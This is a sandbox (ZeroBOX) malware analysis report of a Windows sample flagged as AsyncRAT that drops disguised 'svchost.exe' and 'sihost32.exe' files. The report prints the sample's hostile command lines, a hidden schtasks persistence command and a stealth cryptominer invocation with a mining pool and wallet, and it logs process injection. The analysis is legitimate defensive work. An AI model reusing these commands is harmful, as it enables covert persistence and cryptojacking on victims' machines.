Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 24, 2021, 5:57 p.m.	April 24, 2021, 6 p.m.

Size	1.6MB
Type	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5	`e3b8893e65bdb0f42574c0f7e05ec8ce`
SHA256	`6aa8107578a0d284976d18fb114c1a0ffd247163d9a931b75b1baf42f0616dd5`
CRC32	`2A0C7AC7`
ssdeep	`24576:BqUeiPVa2/7fgcT3pnDB840fxxD8wfRfMt+u9cBEw70dRDHIjogQ1vPFnd/bPT8H:B7VvDXN8/ffD/RYoEw7aIjogQVf0XX`
Yara	PE_Header_Zero - PE File Signature Zero Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE64 - (no description) IsWindowsGUI - (no description) IsPacked - Entropy Check ImportTableIsBad - ImportTable Check

godeth.exe "C:\Users\test22\AppData\Local\Temp\godeth.exe"
2232
- cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
  584
  - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
    2988
- sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
  1940
- svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
  2524
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
    2648
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
      1444
  - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
    1744

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 24, 2021, 5:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2021, 6 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 24, 2021, 5:50 p.m.			0	0
IsDebuggerPresent April 24, 2021, 5:50 p.m.			0	0
IsDebuggerPresent April 24, 2021, 5:59 p.m.			0	0
IsDebuggerPresent April 24, 2021, 5:59 p.m.			0	0
IsDebuggerPresent April 24, 2021, 5:59 p.m.			0	0
IsDebuggerPresent April 24, 2021, 5:59 p.m.			0	0
IsDebuggerPresent April 24, 2021, 6 p.m.			0	0
IsDebuggerPresent April 24, 2021, 6 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 24, 2021, 5:50 p.m.	buffer: SUCCESS: The scheduled task "svchost" has successfully been created. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW April 24, 2021, 5:59 p.m.	buffer: SUCCESS: The scheduled task "svchost" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 24, 2021, 5:50 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 194 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:50 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002490000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 24, 2021, 5:59 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
file	C:\Users\test22\AppData\Local\Temp\svchost.exe

Creates a suspicious process (6 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Users\test22\AppData\Local\Temp\svchost.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	C:\Users\test22\AppData\Local\Temp\svchost.exe
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	C:\Windows/System32\svchost.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x4a82b262BbF466b9F3f946C226CB8A672cFC2F9d`.CTEST22PC@us1.ethermine.org:4444 --unam-stealth

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 24, 2021, 5:50 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath: cmd	1	1	0
ShellExecuteExW April 24, 2021, 5:59 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath: cmd	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0018fa00', u'virtual_address': u'0x00002000', u'entropy': 7.999313521671569, u'name': u'.text', u'virtual_size': u'0x0018f968'}

entropy

7.99931352167

description

A section with a high entropy has been found

entropy

0.992857142857

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 24, 2021, 5:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 24, 2021, 5:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (5 events)

url	https://github.com/openwall/john/issues/3454
url	http://www.gnu.org/licenses/
url	http://www.jsonrpc.org/
url	https://pastebin.com
url	https://raw.githubusercontent.com

Yara rule detected in process memory (17 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Perform crypto currency mining	rule	bitcoin
description	APC queue tasks migration	rule	migrate_apc
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 24, 2021, 5:51 p.m.	thread_identifier: 1348 thread_handle: 0x00000000000003dc process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000408	1	1	0
ShellExecuteExW April 24, 2021, 5:51 p.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe	1	1	0

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess April 24, 2021, 5:59 p.m.	status_code: 0xffffffff process_identifier: 1940 process_handle: 0x0000000000000304		0	0
NtTerminateProcess April 24, 2021, 5:59 p.m.	status_code: 0xffffffff process_identifier: 1940 process_handle: 0x0000000000000304	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 24, 2021, 6 p.m.	process_identifier: 3020 region_size: 3727360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001f0	1	0	0

Installs itself for autorun at Windows startup (3 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
file	C:\Users\test22\AppData\Local\Temp\svchost.exe

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 manipulating memory of non-child process 3020
NtUnmapViewOfSection April 24, 2021, 6 p.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 3020 process_handle: 0x00000000000001f0		-1073741799	0
NtAllocateVirtualMemory April 24, 2021, 6 p.m.	process_identifier: 3020 region_size: 3727360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001f0	1	0	0

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 injected into non-child 3020
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $CZRÚ;<;<;<C¯;<T8 ;<T?;<T9!;<T=;<\S= ;<;=o9< ýò;< ýó;<ÁT8<9<ÁT9;<ÁT5;<ÁT<;<ÁTÃ;<;«;<ÁT>;<Rich;<PEdÀ¹p`ð"L!>\ @à8ó9` æ-Xøæ-¤P8`/h`8r0ÊË(PÊ*0`! .text×J!L! `.rdataÈÇ`!ÈP!@@.dataØ,0.Ê.@À.pdatah`/â.@@.nv_fatbH618t0@À.nvFatBi@8¬7@À.rsrcP8®7@@.relocr`8t¶7@B base_address: 0x0000000140000000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1	0
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: ±CbF1@ base_address: 0x0000000140384000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1	0
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: (@Xpè ¸ È ØQ8hhU8U8} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0000000140385000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1	0
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: @ base_address: 0x000007fffffdd010 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 injected into non-child 3020
